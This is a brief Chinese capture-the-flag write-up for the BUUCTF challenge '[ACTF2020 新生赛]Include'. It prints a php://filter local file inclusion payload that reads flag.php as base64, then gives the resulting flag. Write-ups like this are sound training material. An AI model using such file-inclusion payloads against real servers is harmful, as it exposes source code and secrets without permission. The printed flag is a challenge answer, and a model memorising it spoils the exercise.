Buuctf-web-[ACTF2020 新生赛]Include
根据提示tips进入
一开始傻乎乎的去抓包了,啥也没有。然后就想到了php://filter伪协议。
直接构造payload,和上一个题一样 https://www.cnblogs.com/tac2664/p/13714543.html
payload:?file=php://filter/convert.base64-encode/resource=flag.php
得到了一串儿base64,解码后
】
flag{88e44aa0-d0bd-4d08-afcc-db71b708d4d0}